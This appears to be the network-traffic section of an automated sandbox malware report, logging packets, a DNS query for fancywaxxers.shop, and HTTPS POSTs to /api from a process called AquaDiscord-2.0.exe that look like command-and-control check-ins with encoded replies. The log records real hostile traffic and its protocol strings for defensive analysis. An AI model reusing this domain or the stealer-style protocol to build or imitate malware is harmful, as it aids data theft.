                                                                                        Dec 30, 2024 20:40:02.280236959 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.280301094 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.284593105 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.328923941 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.328952074 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.366449118 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.366492033 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.366529942 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.366549969 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.366561890 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.366622925 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.366622925 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.366674900 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.366883993 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.366899014 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.366909981 CET49731443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.366914034 CET44349731104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.541440964 CET49732443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.541486979 CET44349732104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:02.541553020 CET49732443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.541997910 CET49732443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:02.542016029 CET44349732104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:03.422909975 CET44349732104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:03.423029900 CET49732443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:03.424621105 CET49732443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:03.424627066 CET44349732104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:03.424830914 CET44349732104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:03.426090002 CET49732443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:03.426254034 CET49732443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:03.426284075 CET44349732104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:03.426346064 CET49732443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:03.426353931 CET44349732104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:04.007359028 CET44349732104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:04.007438898 CET44349732104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:04.007512093 CET49732443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:04.008814096 CET49732443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:04.008833885 CET44349732104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:04.106069088 CET49733443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:04.106096983 CET44349733104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:04.106173038 CET49733443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:04.106507063 CET49733443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:04.106517076 CET44349733104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:04.622714043 CET44349733104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:04.622792006 CET49733443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:04.628745079 CET49733443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:04.628760099 CET44349733104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:04.628953934 CET44349733104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:04.631316900 CET49733443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:04.631607056 CET49733443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:04.631633043 CET44349733104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:05.223107100 CET44349733104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:05.223179102 CET44349733104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:05.223232985 CET49733443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:05.236917973 CET49733443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:05.236938953 CET44349733104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:05.432419062 CET49734443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:05.432456017 CET44349734104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:05.432529926 CET49734443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:05.432877064 CET49734443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:05.432892084 CET44349734104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:05.886539936 CET44349734104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:05.886609077 CET49734443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:05.888132095 CET49734443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:05.888138056 CET44349734104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:05.888379097 CET44349734104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:05.889549971 CET49734443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:05.889669895 CET49734443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:05.889710903 CET44349734104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:05.889780998 CET49734443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:05.889791012 CET44349734104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:06.517782927 CET44349734104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:06.517874002 CET44349734104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:06.518058062 CET49734443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:06.518111944 CET49734443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:06.518130064 CET44349734104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:06.934406042 CET49735443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:06.934436083 CET44349735104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:06.934510946 CET49735443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:06.934830904 CET49735443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:06.934842110 CET44349735104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:07.393038034 CET44349735104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:07.393148899 CET49735443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:07.394639969 CET49735443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:07.394650936 CET44349735104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:07.394851923 CET44349735104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:07.396260977 CET49735443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:07.396365881 CET49735443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:07.396372080 CET44349735104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:07.807653904 CET44349735104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:07.807728052 CET44349735104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:07.807792902 CET49735443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:07.807988882 CET49735443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:07.808007002 CET44349735104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.287247896 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.287296057 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.287388086 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.287724972 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.287743092 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.760435104 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.760534048 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.761955023 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.761979103 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.762368917 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.776287079 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.777139902 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.777204990 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.777334929 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.777401924 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.777529001 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.777791977 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.777946949 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.777987003 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.778167963 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.778209925 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.778423071 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.778470039 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.778470993 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.778533936 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.778713942 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.778784990 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.778790951 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.778882027 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.778980017 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.779043913 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.779092073 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.779093981 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.779256105 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.786612034 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.786725044 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.786731958 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.786792040 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.786820889 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:08.786935091 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:08.787035942 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:12.260711908 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:12.260993004 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:12.261086941 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:12.261178017 CET49736443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:12.261221886 CET44349736104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:12.291284084 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:12.291402102 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:12.291501045 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:12.291766882 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:12.291815996 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:12.789589882 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:12.789706945 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:12.794553995 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:12.794595003 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:12.795026064 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:12.796437025 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:12.796477079 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:12.796544075 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.250654936 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.250787973 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.250864983 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:13.250881910 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.250932932 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.250982046 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:13.250999928 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.251178980 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.251224041 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:13.251240015 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.251352072 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.251409054 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:13.251421928 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.251511097 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.251564026 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:13.251576900 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.251754999 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.251826048 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:13.285259008 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:13.285298109 CET44349737104.21.16.1192.168.2.4
                                                                                        Dec 30, 2024 20:40:13.285322905 CET49737443192.168.2.4104.21.16.1
                                                                                        Dec 30, 2024 20:40:13.285340071 CET44349737104.21.16.1192.168.2.4
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 30, 2024 20:40:00.254085064 CET6169653192.168.2.41.1.1.1
                                                                                        Dec 30, 2024 20:40:00.271703005 CET53616961.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 30, 2024 20:40:00.254085064 CET192.168.2.41.1.1.10x35ceStandard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 30, 2024 20:40:00.271703005 CET1.1.1.1192.168.2.40x35ceNo error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                        Dec 30, 2024 20:40:00.271703005 CET1.1.1.1192.168.2.40x35ceNo error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                        Dec 30, 2024 20:40:00.271703005 CET1.1.1.1192.168.2.40x35ceNo error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                        Dec 30, 2024 20:40:00.271703005 CET1.1.1.1192.168.2.40x35ceNo error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                        Dec 30, 2024 20:40:00.271703005 CET1.1.1.1192.168.2.40x35ceNo error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                        Dec 30, 2024 20:40:00.271703005 CET1.1.1.1192.168.2.40x35ceNo error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                        Dec 30, 2024 20:40:00.271703005 CET1.1.1.1192.168.2.40x35ceNo error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                        • fancywaxxers.shop
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449730104.21.16.14437400C:\Users\user\Desktop\AquaDiscord-2.0.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-30 19:40:00 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-30 19:40:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-12-30 19:40:01 UTC1131INHTTP/1.1 200 OK
                                                                                        Date: Mon, 30 Dec 2024 19:40:01 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=b1o80u6obo0pn0hsfjjfj6139q; expires=Fri, 25 Apr 2025 13:26:40 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K8KJFUlaFNbhZ6K%2BTXQBISeaueAZXvIPdOr4ZCz9jgQZmNF7t6fNyClYlUjyUCRHmbRtCL6022K6R0tW1GePHouqorXiNTmnYqTpJRrmAJhO%2Fvlyw5y%2BRh2CvO6%2Fuge4nmDSVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fa47fc96f828ce0-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1797&rtt_var=682&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1596500&cwnd=211&unsent_bytes=0&cid=bdf99d64489cc5d2&ts=501&x=0"
                                                                                        2024-12-30 19:40:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-12-30 19:40:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449731104.21.16.14437400C:\Users\user\Desktop\AquaDiscord-2.0.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-30 19:40:01 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 51
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-30 19:40:01 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--899083440&j=
                                                                                        2024-12-30 19:40:02 UTC1129INHTTP/1.1 200 OK
                                                                                        Date: Mon, 30 Dec 2024 19:40:02 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=77hthstauu875brtt56a0126lq; expires=Fri, 25 Apr 2025 13:26:41 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wB9Qjpg%2BP9XTS%2BbSG8Pi%2BSGclEsk6uRXnAbczl8Z8g3ENCIgY4LrnybdICFu7TQMmqJfXpYp9O0df7Bf3YQGXAwiNW04pByC4xk1iCnOUDqEHw4VOEY8JCVfeQSwDzq9RpXJJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fa47fcfe85d4388-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1626&rtt_var=612&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=952&delivery_rate=1784841&cwnd=221&unsent_bytes=0&cid=83d6d8c03dff897e&ts=558&x=0"
                                                                                        2024-12-30 19:40:02 UTC240INData Raw: 63 33 61 0d 0a 6e 71 73 49 62 66 43 2f 63 31 66 59 31 4b 41 61 78 6d 78 70 64 57 75 50 49 31 58 38 6a 37 54 77 38 51 4c 33 41 31 46 59 39 58 6a 6c 69 58 35 50 79 6f 74 66 64 61 75 78 67 69 43 79 48 68 77 51 52 36 31 43 4d 64 36 31 30 70 47 64 63 5a 49 76 63 79 36 59 57 71 54 4e 61 51 47 44 32 6c 39 31 76 61 79 43 49 4a 30 58 53 78 41 46 72 52 6c 33 6d 65 58 57 6b 5a 31 67 6c 6d 67 2b 4b 4a 6b 62 39 73 64 76 42 5a 58 63 46 7a 61 30 75 63 56 2f 6f 77 30 44 47 77 4c 69 53 7a 6a 65 6f 35 61 56 69 79 44 4e 49 52 77 39 67 52 6e 54 79 6e 73 47 30 73 4a 66 4c 50 71 78 7a 6a 6a 38 54 67 67 51 43 65 4e 46 4d 5a 66 6e 33 4a 69 56 59 5a 4e 70 49 54 47 54 45 50 62 4a 62 41 53 66 31 51 4d 37 76 72 37 4f 65 61 6b 4e 53 31 6c
                                                                                        Data Ascii: c3anqsIbfC/c1fY1KAaxmxpdWuPI1X8j7Tw8QL3A1FY9XjliX5PyotfdauxgiCyHhwQR61CMd610pGdcZIvcy6YWqTNaQGD2l91vayCIJ0XSxAFrRl3meXWkZ1glmg+KJkb9sdvBZXcFza0ucV/ow0DGwLiSzjeo5aViyDNIRw9gRnTynsG0sJfLPqxzjj8TggQCeNFMZfn3JiVYZNpITGTEPbJbASf1QM7vr7OeakNS1l
                                                                                        2024-12-30 19:40:02 UTC1369INData Raw: 4a 36 6c 6c 33 78 71 32 46 6f 4a 42 78 68 48 51 2b 4b 70 46 61 34 34 64 7a 54 35 58 52 55 57 33 36 76 73 35 32 6f 51 30 45 45 41 6a 74 55 7a 69 65 37 74 36 61 6c 32 71 61 62 6a 77 30 6e 52 33 30 77 47 30 41 6c 64 55 58 4f 72 6e 32 6a 44 69 6a 46 6b 74 50 53 63 31 52 4e 4a 33 35 32 34 50 54 66 39 74 34 63 7a 32 62 57 71 53 4a 62 41 47 54 30 42 45 6e 73 72 33 4a 66 62 59 46 41 68 6f 45 37 55 77 39 6b 65 37 57 6c 5a 6c 71 6d 6d 73 33 4e 35 6f 63 2f 4d 6b 71 51 64 4c 61 43 58 58 69 39 75 46 39 74 41 6b 48 41 55 76 58 41 53 6a 51 39 4a 61 56 6e 79 44 4e 49 54 73 2f 6c 42 6e 33 78 6d 6b 48 6d 63 38 52 4a 37 79 37 78 32 71 69 43 77 55 64 43 76 39 4c 4f 5a 6a 75 33 35 6d 61 5a 5a 4a 6c 63 33 54 58 48 65 53 4a 4d 6b 2b 7a 30 42 6f 35 73 4b 48 43 4f 4c 74 41 45 6c
                                                                                        Data Ascii: J6ll3xq2FoJBxhHQ+KpFa44dzT5XRUW36vs52oQ0EEAjtUzie7t6al2qabjw0nR30wG0AldUXOrn2jDijFktPSc1RNJ3524PTf9t4cz2bWqSJbAGT0BEnsr3JfbYFAhoE7Uw9ke7WlZlqmms3N5oc/MkqQdLaCXXi9uF9tAkHAUvXASjQ9JaVnyDNITs/lBn3xmkHmc8RJ7y7x2qiCwUdCv9LOZju35maZZJlc3TXHeSJMk+z0Bo5sKHCOLtAEl
                                                                                        2024-12-30 19:40:02 UTC1369INData Raw: 50 5a 6a 69 32 35 37 54 4c 74 56 6d 4b 33 72 50 57 74 62 4b 66 67 79 59 6e 79 51 32 74 4c 6a 46 62 75 51 52 52 51 35 4a 36 6b 31 33 78 71 33 62 6b 35 74 6d 68 32 34 2b 4f 5a 6b 55 38 38 78 6c 42 35 4c 64 48 44 43 2b 76 63 6c 37 71 51 6f 5a 48 51 6e 6c 52 44 61 55 35 35 62 63 30 32 65 4e 49 57 74 36 70 67 33 33 69 31 38 4d 6e 4e 4d 57 49 2f 71 70 6a 47 48 6b 43 51 64 58 55 61 31 4d 50 35 76 6f 32 5a 4f 5a 62 70 42 72 50 7a 4b 5a 47 65 37 47 62 67 2b 65 31 52 73 34 74 4c 4c 4b 63 61 38 46 44 52 63 49 35 77 46 35 33 75 72 4f 30 73 73 67 6f 57 59 2f 4e 35 68 59 79 63 70 6b 41 5a 58 4c 55 53 72 30 72 34 4a 2f 71 45 35 54 56 77 58 6b 51 54 79 55 36 64 61 56 6e 6d 57 57 5a 6a 41 33 6b 42 44 79 7a 6d 34 44 6d 39 41 58 4e 62 32 79 78 32 71 68 42 77 63 62 53 61 4d
                                                                                        Data Ascii: PZji257TLtVmK3rPWtbKfgyYnyQ2tLjFbuQRRQ5J6k13xq3bk5tmh24+OZkU88xlB5LdHDC+vcl7qQoZHQnlRDaU55bc02eNIWt6pg33i18MnNMWI/qpjGHkCQdXUa1MP5vo2ZOZbpBrPzKZGe7Gbg+e1Rs4tLLKca8FDRcI5wF53urO0ssgoWY/N5hYycpkAZXLUSr0r4J/qE5TVwXkQTyU6daVnmWWZjA3kBDyzm4Dm9AXNb2yx2qhBwcbSaM
                                                                                        2024-12-30 19:40:02 UTC159INData Raw: 70 69 4c 30 32 65 5a 49 57 74 36 6e 68 50 75 78 32 51 47 6e 39 73 5a 4d 72 53 37 79 58 36 76 43 51 77 52 42 4f 56 4d 4d 70 33 73 30 70 69 42 59 35 35 72 50 6a 44 58 56 4c 7a 4f 63 6b 2f 4b 6e 54 59 35 6b 36 62 5a 61 72 4a 4f 46 46 6b 51 72 55 59 37 33 72 57 57 6b 5a 78 70 6d 6d 6b 37 4e 5a 67 65 38 73 39 73 41 70 66 53 47 79 65 79 75 4d 39 7a 71 77 55 5a 46 77 54 70 54 54 4f 57 35 74 7a 53 33 53 43 53 65 58 4e 69 31 79 2f 78 78 6d 6f 4d 68 4a 30 4f 65 36 50 32 78 58 0d 0a
                                                                                        Data Ascii: piL02eZIWt6nhPux2QGn9sZMrS7yX6vCQwRBOVMMp3s0piBY55rPjDXVLzOck/KnTY5k6bZarJOFFkQrUY73rWWkZxpmmk7NZge8s9sApfSGyeyuM9zqwUZFwTpTTOW5tzS3SCSeXNi1y/xxmoMhJ0Oe6P2xX
